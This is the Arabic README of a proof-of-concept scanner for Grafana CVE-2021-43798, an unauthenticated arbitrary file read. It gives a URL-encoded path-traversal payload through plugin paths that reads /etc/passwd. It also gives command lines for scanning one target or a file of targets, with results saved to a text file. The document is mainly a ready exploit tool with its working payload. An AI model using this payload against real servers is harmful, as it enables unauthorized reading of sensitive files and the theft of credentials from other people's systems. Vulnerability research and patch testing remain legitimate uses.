
grafana CVE-2021-43798 POC لثغرة قراءة الملفات التعسفية، يستخدم طريقة الكشف الدوري عبر عدة إضافات، ويسمح بتحديد عنوان URL واحد أو قراءة عناوين URL من ملف.
إذا تمت معالجة الهدف عبر وكيل عكسي، يمكن استبدال الحمولة بهذه:
url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"
Grafana هو منصة ويب مفتوحة المصدر وعبر الأنظمة لعرض البيانات وتصورها. بعد أن يقوم المستخدم بتكوين مصدر بيانات متصل، يمكن لـ Grafana عرض الرسوم البيانية والتنبيهات في متصفح الويب.
يوجد في Grafana ثغرة أمنية تسمح بقراءة الملفات العشوائية دون تفويض، حيث يمكن للمهاجم دون الحاجة إلى مصادقة استغلال هذه الثغرة لقراءة أي ملف على المضيف.
CVE: CVE-2021-43798
المكون: Grafana
نوع الثغرة: قراءة الملفات
التأثير: الحصول على معلومات حساسة
الوصف المختصر: يمكن للمهاجم غير المصرح له استغلال هذه الثغرة للحصول على ملفات حساسة من الخادم
1、فحص عنوان URL واحد
python3 grafana_fileread.py -u http://localhost:3000
يمكن عرض البيانات التي تم الحصول عليها في ملف grafana 8.x_fileread_vuln.txt
2、فحص عناوين IP داخل ملف
python3 grafana_fileread.py -f http://localhost:3000

3、-h لعرض المساعدة
